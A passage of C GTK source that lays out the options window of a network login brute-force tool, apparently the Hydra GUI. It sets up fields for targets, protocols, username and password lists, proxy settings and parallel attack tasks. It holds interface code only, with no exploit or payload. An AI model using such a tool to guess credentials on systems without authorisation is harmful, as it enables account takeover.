gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"telnet\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"vnc\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"vmauthd\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"xmpp\");\n\n entProtocol = gtk_bin_get_child(GTK_BIN(cmbProtocol));\n gtk_widget_set_name(entProtocol, \"entProtocol\");\n gtk_widget_show(entProtocol);\n gtk_widget_set_tooltip_text(entProtocol, \"The protocol to use for the login/password cracking attempt\");\n\n label7 = gtk_label_new(\"Protocol\");\n gtk_widget_set_name(label7, \"label7\");\n gtk_widget_show(label7);\n gtk_table_attach(GTK_TABLE(table8), label7, 0, 1, 4, 5, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label7), 0, 0.5);\n\n spnPort_adj = gtk_adjustment_new(0, 0, 65535, 1, 10, 0);\n spnPort = gtk_spin_button_new(GTK_ADJUSTMENT(spnPort_adj), 1, 0);\n gtk_widget_set_name(spnPort, \"spnPort\");\n gtk_widget_show(spnPort);\n gtk_table_attach(GTK_TABLE(table8), spnPort, 1, 2, 3, 4, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(spnPort, \"select the port on which the daemon you want to brute force runs, 0 means default\");\n\n label6 = gtk_label_new(\"Port\");\n gtk_widget_set_name(label6, \"label6\");\n gtk_widget_show(label6);\n gtk_table_attach(GTK_TABLE(table8), label6, 0, 1, 3, 4, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label6), 0, 0.5);\n\n chkIPV6 = gtk_check_button_new_with_mnemonic(\"Prefer IPV6\");\n gtk_widget_set_name(chkIPV6, \"chkIPV6\");\n gtk_widget_show(chkIPV6);\n gtk_table_attach(GTK_TABLE(table8), chkIPV6, 0, 2, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkIPV6, \"Enable to use IPV6\");\n\n radioTarget2 = gtk_radio_button_new_with_mnemonic(NULL, \"Target List\");\n gtk_widget_set_name(radioTarget2, \"radioTarget2\");\n gtk_widget_show(radioTarget2);\n gtk_table_attach(GTK_TABLE(table8), radioTarget2, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioTarget2), radioTarget2_group);\n radioTarget2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioTarget2));\n\n entTargetFile = gtk_entry_new();\n gtk_widget_set_name(entTargetFile, \"entTargetFile\");\n gtk_widget_show(entTargetFile);\n gtk_table_attach(GTK_TABLE(table8), entTargetFile, 1, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entTargetFile, \"A file which contains the targets to attack. One entry per line. IP\\naddresses and/or DNS names.\");\n\n entTarget = gtk_entry_new();\n gtk_widget_set_name(entTarget, \"entTarget\");\n gtk_widget_show(entTarget);\n gtk_table_attach(GTK_TABLE(table8), entTarget, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entTarget, \"The target to attack - DNS name or IP address\");\n gtk_entry_set_text(GTK_ENTRY(entTarget), \"127.0.0.1\");\n\n radioTarget1 = gtk_radio_button_new_with_mnemonic(NULL, \"Single Target\");\n gtk_widget_set_name(radioTarget1, \"radioTarget1\");\n gtk_widget_show(radioTarget1);\n gtk_table_attach(GTK_TABLE(table8), radioTarget1, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioTarget1), radioTarget2_group);\n radioTarget2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioTarget1));\n gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioTarget1), TRUE);\n\n label28 = gtk_label_new(\"Target\");\n gtk_widget_set_name(label28, \"label28\");\n gtk_widget_show(label28);\n gtk_frame_set_label_widget(GTK_FRAME(frame11), label28);\n\n frame12 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame12, \"frame12\");\n gtk_widget_show(frame12);\n gtk_box_pack_start(GTK_BOX(vbox5), frame12, TRUE, TRUE, 0);\n\n table9 = gtk_table_new(3, 3, FALSE);\n gtk_widget_set_name(table9, \"table9\");\n gtk_widget_show(table9);\n gtk_container_add(GTK_CONTAINER(frame12), table9);\n\n chkVerbose = gtk_check_button_new_with_mnemonic(\"Be Verbose\");\n gtk_widget_set_name(chkVerbose, \"chkVerbose\");\n gtk_widget_show(chkVerbose);\n gtk_table_attach(GTK_TABLE(table9), chkVerbose, 2, 3, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkVerbose, \"be verbose\");\n\n chkDebug = gtk_check_button_new_with_mnemonic(\"Debug\");\n gtk_widget_set_name(chkDebug, \"chkDebug\");\n gtk_widget_show(chkDebug);\n gtk_table_attach(GTK_TABLE(table9), chkDebug, 2, 3, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkDebug, \"Enable debug mode\");\n\n chkAttempts = gtk_check_button_new_with_mnemonic(\"Show Attempts\");\n gtk_widget_set_name(chkAttempts, \"chkAttempts\");\n gtk_widget_show(chkAttempts);\n gtk_table_attach(GTK_TABLE(table9), chkAttempts, 0, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkAttempts, \"Show attempts\");\n\n chkSSL = gtk_check_button_new_with_mnemonic(\"Use SSL\");\n gtk_widget_set_name(chkSSL, \"chkSSL\");\n gtk_widget_show(chkSSL);\n gtk_table_attach(GTK_TABLE(table9), chkSSL, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkSSL, \"Enable to use SSL (the target must have SSL enabled!)\");\n\n chkServiceDetails = gtk_check_button_new_with_mnemonic(\"Service Module Usage Details\");\n gtk_widget_set_name(chkServiceDetails, \"chkServiceDetails\");\n gtk_widget_show(chkServiceDetails);\n gtk_table_attach(GTK_TABLE(table9), chkServiceDetails, 2, 3, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkServiceDetails, \"Service Module Usage Details\");\n\n chkCompleteHelp = gtk_check_button_new_with_mnemonic(\"COMPLETE HELP\");\n gtk_widget_set_name(chkCompleteHelp, \"chkCompleteHelp\");\n gtk_widget_show(chkCompleteHelp);\n gtk_table_attach(GTK_TABLE(table9), chkCompleteHelp, 0, 2, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkCompleteHelp, \"Complete Help\");\n\n chkOldSSL = gtk_check_button_new_with_mnemonic(\"Use old SSL\");\n gtk_widget_set_name(chkOldSSL, \"chkOldSSL\");\n gtk_widget_show(chkOldSSL);\n gtk_table_attach(GTK_TABLE(table9), chkOldSSL, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkOldSSL, \"Enable to use old SSL (the target must have SSL enabled!)\");\n\n label29 = gtk_label_new(\"Output Options\");\n gtk_widget_set_name(label29, \"label29\");\n gtk_widget_show(label29);\n gtk_frame_set_label_widget(GTK_FRAME(frame12), label29);\n\n label1 = gtk_label_new(\"Target\");\n gtk_widget_set_name(label1, \"label1\");\n gtk_widget_show(label1);\n gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 0), label1);\n\n vbox2 = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0);\n gtk_widget_set_name(vbox2, \"vbox2\");\n gtk_widget_show(vbox2);\n gtk_container_add(GTK_CONTAINER(ntbMain), vbox2);\n\n frmUsername = gtk_frame_new(NULL);\n gtk_widget_set_name(frmUsername, \"frmUsername\");\n gtk_widget_show(frmUsername);\n gtk_box_pack_start(GTK_BOX(vbox2), frmUsername, TRUE, TRUE, 0);\n\n table2 = gtk_table_new(3, 2, FALSE);\n gtk_widget_set_name(table2, \"table2\");\n gtk_widget_show(table2);\n gtk_container_add(GTK_CONTAINER(frmUsername), table2);\n\n entUsernameFile = gtk_entry_new();\n gtk_widget_set_name(entUsernameFile, \"entUsernameFile\");\n gtk_widget_show(entUsernameFile);\n gtk_table_attach(GTK_TABLE(table2), entUsernameFile, 1, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_widget_set_tooltip_text(entUsernameFile, \"File with user logins, one entry per line\");\n\n entUsername = gtk_entry_new();\n gtk_widget_set_name(entUsername, \"entUsername\");\n gtk_widget_show(entUsername);\n gtk_table_attach(GTK_TABLE(table2), entUsername, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_widget_set_tooltip_text(entUsername, \"The login to use\");\n gtk_entry_set_text(GTK_ENTRY(entUsername), \"yourname\");\n\n radioUsername1 = gtk_radio_button_new_with_mnemonic(NULL, \"Username\");\n gtk_widget_set_name(radioUsername1, \"radioUsername1\");\n gtk_widget_show(radioUsername1);\n gtk_table_attach(GTK_TABLE(table2), radioUsername1, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioUsername1), radioUsername1_group);\n radioUsername1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioUsername1));\n gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioUsername1), TRUE);\n\n radioUsername2 = gtk_radio_button_new_with_mnemonic(NULL, \"Username List\");\n gtk_widget_set_name(radioUsername2, \"radioUsername2\");\n gtk_widget_show(radioUsername2);\n gtk_table_attach(GTK_TABLE(table2), radioUsername2, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioUsername2), radioUsername1_group);\n radioUsername1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioUsername2));\n\n chkUsernameLoop = gtk_check_button_new_with_mnemonic(\"Loop around users\");\n gtk_widget_set_name(chkUsernameLoop, \"chkUsernameLoop\");\n gtk_widget_show(chkUsernameLoop);\n gtk_table_attach(GTK_TABLE(table2), chkUsernameLoop, 0, 1, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkUsernameLoop, \"Enable this option to loop around users not passwords\");\n\n chkDisUser = gtk_check_button_new_with_mnemonic(\"Protocol does not require usernames\");\n gtk_widget_set_name(chkDisUser, \"chkDisUser\");\n gtk_widget_show(chkDisUser);\n gtk_table_attach(GTK_TABLE(table2), chkDisUser, 1, 2, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkDisUser, \"Protocols like Cisco, Cisco enable, redis, Oracle listener, SNMP, S7-300, VNC etc. are not using usernames\");\n\n label8 = gtk_label_new(\"Username\");\n gtk_widget_set_name(label8, \"label8\");\n gtk_widget_show(label8);\n gtk_frame_set_label_widget(GTK_FRAME(frmUsername), label8);\n\n frmPass = gtk_frame_new(NULL);\n gtk_widget_set_name(frmPass, \"frmPass\");\n gtk_widget_show(frmPass);\n gtk_box_pack_start(GTK_BOX(vbox2), frmPass, TRUE, TRUE, 0);\n\n table3 = gtk_table_new(3, 2, FALSE);\n gtk_widget_set_name(table3, \"table3\");\n gtk_widget_show(table3);\n gtk_container_add(GTK_CONTAINER(frmPass), table3);\n\n entPassFile = gtk_entry_new();\n gtk_widget_set_name(entPassFile, \"entPassFile\");\n gtk_widget_show(entPassFile);\n gtk_table_attach(GTK_TABLE(table3), entPassFile, 1, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_widget_set_tooltip_text(entPassFile, \"File with passwords to try, one entry per line\");\n\n entPass = gtk_entry_new();\n gtk_widget_set_name(entPass, \"entPass\");\n gtk_widget_show(entPass);\n gtk_table_attach(GTK_TABLE(table3), entPass, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_widget_set_tooltip_text(entPass, \"The password to try\");\n gtk_entry_set_text(GTK_ENTRY(entPass), \"yourpass\");\n\n radioPass1 = gtk_radio_button_new_with_mnemonic(NULL, \"Password\");\n gtk_widget_set_name(radioPass1, \"radioPass1\");\n gtk_widget_show(radioPass1);\n gtk_table_attach(GTK_TABLE(table3), radioPass1, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioPass1), radioPass1_group);\n radioPass1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioPass1));\n gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioPass1), TRUE);\n\n radioPass2 = gtk_radio_button_new_with_mnemonic(NULL, \"Password List\");\n gtk_widget_set_name(radioPass2, \"radioPass2\");\n gtk_widget_show(radioPass2);\n gtk_table_attach(GTK_TABLE(table3), radioPass2, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioPass2), radioPass1_group);\n radioPass1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioPass2));\n radioGenerate = gtk_radio_button_new_with_mnemonic(NULL, \"Generate\");\n gtk_widget_set_name(radioGenerate, \"radioGenerate\");\n gtk_widget_show(radioGenerate);\n gtk_table_attach(GTK_TABLE(table3), radioGenerate, 0, 1, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioGenerate), radioPass1_group);\n radioPass1_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioGenerate));\n\n entGeneration = gtk_entry_new();\n gtk_widget_set_name(entGeneration, \"entGeneration\");\n gtk_widget_show(entGeneration);\n gtk_table_attach(GTK_TABLE(table3), entGeneration, 1, 2, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), 0, 0);\n gtk_widget_set_tooltip_text(entGeneration, \"Generate passwords\");\n gtk_entry_set_text(GTK_ENTRY(entGeneration), \"1:1:a\");\n\n labelpass = gtk_label_new(\"Password\");\n gtk_widget_set_name(labelpass, \"labelpass\");\n gtk_widget_show(labelpass);\n gtk_frame_set_label_widget(GTK_FRAME(frmPass), labelpass);\n\n frame8 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame8, \"frame8\");\n gtk_widget_show(frame8);\n gtk_box_pack_start(GTK_BOX(vbox2), frame8, TRUE, TRUE, 0);\n\n table5 = gtk_table_new(1, 2, FALSE);\n gtk_widget_set_name(table5, \"table5\");\n gtk_widget_show(table5);\n gtk_container_add(GTK_CONTAINER(frame8), table5);\n\n chkColon = gtk_check_button_new_with_mnemonic(\"Use Colon separated file\");\n gtk_widget_set_name(chkColon, \"chkColon\");\n gtk_widget_show(chkColon);\n gtk_table_attach(GTK_TABLE(table5), chkColon, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkColon, \"Enable this option to use a colon file for login/password attempts\");\n\n entColonFile = gtk_entry_new();\n gtk_widget_set_name(entColonFile, \"entColonFile\");\n gtk_widget_show(entColonFile);\n gtk_table_attach(GTK_TABLE(table5), entColonFile, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entColonFile, \"The colon file to use, each line has to be structured like \\\"mylogin:mypass\\\"\");\n\n label20 = gtk_label_new(\"Colon separated file\");\n gtk_widget_set_name(label20, \"label20\");\n gtk_widget_show(label20);\n gtk_frame_set_label_widget(GTK_FRAME(frame8), label20);\n\n table6 = gtk_table_new(1, 3, FALSE);\n gtk_widget_set_name(table6, \"table6\");\n gtk_widget_show(table6);\n gtk_box_pack_start(GTK_BOX(vbox2), table6, TRUE, TRUE, 0);\n\n chkPassLogin = gtk_check_button_new_with_mnemonic(\"Try login as password\");\n gtk_widget_set_name(chkPassLogin, \"chkPassLogin\");\n gtk_widget_show(chkPassLogin);\n gtk_table_attach(GTK_TABLE(table6), chkPassLogin, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkPassLogin, \"Enable this option to try the login as password, in addition to the password/file\");\n\n chkPassNull = gtk_check_button_new_with_mnemonic(\"Try empty password\");\n gtk_widget_set_name(chkPassNull, \"chkPassNull\");\n gtk_widget_show(chkPassNull);\n gtk_table_attach(GTK_TABLE(table6), chkPassNull, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkPassNull, \"Enable this option to try an empty password, in addition to the password/file\");\n\n chkPassReverse = gtk_check_button_new_with_mnemonic(\"Try reversed login\");\n gtk_widget_set_name(chkPassReverse, \"chkPassReverse\");\n gtk_widget_show(chkPassReverse);\n gtk_table_attach(GTK_TABLE(table6), chkPassReverse, 2, 3, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkPassReverse, \"Enable this option to try an reverse password, in addition to the password/file\");\n\n label2 = gtk_label_new(\"Passwords\");\n gtk_widget_set_name(label2, \"label2\");\n gtk_widget_show(label2);\n gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 1), label2);\n\n table4 = gtk_table_new(2, 1, FALSE);\n gtk_widget_set_name(table4, \"table4\");\n gtk_widget_show(table4);\n gtk_container_add(GTK_CONTAINER(ntbMain), table4);\n\n frame9 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame9, \"frame9\");\n gtk_widget_show(frame9);\n gtk_table_attach(GTK_TABLE(table4), frame9, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK | GTK_FILL), (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK | GTK_FILL), 0, 0);\n\n table7 = gtk_table_new(5, 2, FALSE);\n gtk_widget_set_name(table7, \"table7\");\n gtk_widget_show(table7);\n gtk_container_add(GTK_CONTAINER(frame9), table7);\n\n label22 = gtk_label_new(\"Proxy \");\n gtk_widget_set_name(label22, \"label22\");\n gtk_widget_show(label22);\n gtk_table_attach(GTK_TABLE(table7), label22, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label22), 0, 0.5);\n\n entHTTPProxy = gtk_entry_new();\n gtk_widget_set_name(entHTTPProxy, \"entHTTPProxy\");\n gtk_widget_show(entHTTPProxy);\n gtk_table_attach(GTK_TABLE(table7), entHTTPProxy, 1, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entHTTPProxy, \"The address of the proxy. Syntax: \\\"http://123.45.67.89:8080\\\"\");\n gtk_entry_set_text(GTK_ENTRY(entHTTPProxy), \"http://127.0.0.1:8080\");\n\n chkProxyAuth = gtk_check_button_new_with_mnemonic(\"Proxy needs authentication\");\n gtk_widget_set_name(chkProxyAuth, \"chkProxyAuth\");\n gtk_widget_show(chkProxyAuth);\n gtk_table_attach(GTK_TABLE(table7), chkProxyAuth, 0, 1, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkProxyAuth, \"Enable this if the proxy requires authenticatio\");\n\n label23 = gtk_label_new(\"Username\");\n gtk_widget_set_name(label23, \"label23\");\n gtk_widget_show(label23);\n gtk_table_attach(GTK_TABLE(table7), label23, 0, 1, 3, 4, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label23), 0, 0.5);\n\n entProxyUser = gtk_entry_new();\n gtk_widget_set_name(entProxyUser, \"entProxyUser\");\n gtk_widget_show(entProxyUser);\n gtk_table_attach(GTK_TABLE(table7), entProxyUser, 1, 2, 3, 4, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entProxyUser, \"The user name for proxy authentication\");\n gtk_entry_set_text(GTK_ENTRY(entProxyUser), \"yourname\");\n\n label24 = gtk_label_new(\"Password\");\n gtk_widget_set_name(label24, \"label24\");\n gtk_widget_show(label24);\n gtk_table_attach(GTK_TABLE(table7), label24, 0, 1, 4, 5, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label24), 0, 0.5);\n\n entProxyPass = gtk_entry_new();\n gtk_widget_set_name(entProxyPass, \"entProxyPass\");\n gtk_widget_show(entProxyPass);\n gtk_table_attach(GTK_TABLE(table7), entProxyPass, 1, 2, 4, 5, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(entProxyPass, \"The password for proxy authentication\");\n gtk_entry_set_text(GTK_ENTRY(entProxyPass), \"yourpass\");\n\n label26 = gtk_label_new(\"\");\n gtk_widget_set_name(label26, \"label26\");\n gtk_widget_show(label26);\n gtk_table_attach(GTK_TABLE(table7), label26, 1, 2, 2, 3, (GtkAttachOptions)(GTK_FILL), (GtkAttachOptions)(0), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label26), 0, 0.5);\n\n hbox3 = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0);\n gtk_widget_set_name(hbox3, \"hbox3\");\n gtk_widget_show(hbox3);\n gtk_table_attach(GTK_TABLE(table7), hbox3, 0, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK | GTK_FILL), (GtkAttachOptions)(GTK_EXPAND | GTK_FILL), 0, 0);\n\n radioProxy = gtk_radio_button_new_with_mnemonic(NULL, \"No Proxy\");\n gtk_widget_set_name(radioProxy, \"radioProxy\");\n gtk_widget_show(radioProxy);\n gtk_box_pack_start(GTK_BOX(hbox3), radioProxy, TRUE, TRUE, 0);\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy), radioProxy_group);\n radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy));\n gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(radioProxy), TRUE);\n\n radioProxy2 = gtk_radio_button_new_with_mnemonic(NULL, \"HTTP Method\");\n gtk_widget_set_name(radioProxy2, \"radioProxy2\");\n gtk_widget_show(radioProxy2);\n gtk_box_pack_start(GTK_BOX(hbox3), radioProxy2, TRUE, TRUE, 0);\n gtk_widget_set_tooltip_text(radioProxy2, \"Enable this to use a proxy for scanning ( Only for HTTP Module )\");\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy2), radioProxy_group);\n radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy2));\n\n radioProxy3 = gtk_radio_button_new_with_mnemonic(NULL, \"CONNECT Method\");\n gtk_widget_set_name(radioProxy3, \"radioProxy3\");\n gtk_widget_show(radioProxy3);\n gtk_box_pack_start(GTK_BOX(hbox3), radioProxy3, TRUE, TRUE, 0);\n gtk_widget_set_tooltip_text(radioProxy3, \"Enable this to use a proxy for scanning\");\n gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioProxy3), radioProxy_group);\n radioProxy_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioProxy3));\n\n label21 = gtk_label_new(\"Use a HTTP/HTTPS Proxy\");\n gtk_widget_set_name(label21, \"label21\");\n gtk_widget_show(label21);\n gtk_frame_set_label_widget(GTK_FRAME(frame9), label21);\n\n frame13 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame13, \"frame13\");\n gtk_widget_show(frame13);\n gtk_table_attach(GTK_TABLE(table4), frame13, 0, 1, 0, 1, (GtkAttachOptions)(GTK_FILL), (GtkAttachOptions)(GTK_EXPAND | GTK_FILL), 0, 0);\n\n table10 = gtk_table_new(5, 2, FALSE);\n gtk_widget_set_name(table10, \"table10\");\n gtk_widget_show(table10);\n gtk_container_add(GTK_CONTAINER(frame13), table10);\n\n chkExitf = gtk_check_button_new_with_mnemonic(\"Exit after first found pair (per host)\");\n gtk_widget_set_name(chkExitf, \"chkExitf\");\n gtk_widget_show(chkExitf);\n gtk_table_attach(GTK_TABLE(table10), chkExitf, 0, 2, 2, 3, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkExitf, \"Enable this to stop all attacking processes once a valid login/password pair is found (per host)\");\n\n spnTimeout_adj = gtk_adjustment_new(30, 0, 295, 1, 10, 0);\n spnTimeout = gtk_spin_button_new(GTK_ADJUSTMENT(spnTimeout_adj), 1, 0);\n gtk_widget_set_name(spnTimeout, \"spnTimeout\");\n gtk_widget_show(spnTimeout);\n gtk_table_attach(GTK_TABLE(table10), spnTimeout, 1, 2, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(spnTimeout, \"The maximum timeout an attack process is waiting for a response from the target\");\n\n spnTasks_adj = gtk_adjustment_new(16, 0, 128, 1, 10, 0);\n spnTasks = gtk_spin_button_new(GTK_ADJUSTMENT(spnTasks_adj), 1, 0);\n gtk_widget_set_name(spnTasks, \"spnTasks\");\n gtk_widget_show(spnTasks);\n gtk_table_attach(GTK_TABLE(table10), spnTasks, 1, 2, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(spnTasks, \"The number of attack tasks to run in parallel. The more the faster, the most: computer lockup :-) 16-64 is a good choice\");\n\n label32 = gtk_label_new(\"Timeout\");\n gtk_widget_set_name(label32, \"label32\");\n gtk_widget_show(label32);\n gtk_table_attach(GTK_TABLE(table10), label32, 0, 1, 1, 2, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label32), 0, 0.5);\n\n label31 = gtk_label_new(\"Number of Tasks\");\n gtk_widget_set_name(label31, \"label31\");\n gtk_widget_show(label31);\n gtk_table_attach(GTK_TABLE(table10), label31, 0, 1, 0, 1, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_misc_set_alignment(GTK_MISC(label31), 0, 0.5);\n\n chkExitF = gtk_check_button_new_with_mnemonic(\"Exit after first found pair (global)\");\n gtk_widget_set_name(chkExitF, \"chkExitF\");\n gtk_widget_show(chkExitF);\n gtk_table_attach(GTK_TABLE(table10), chkExitF, 0, 2, 3, 4, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n 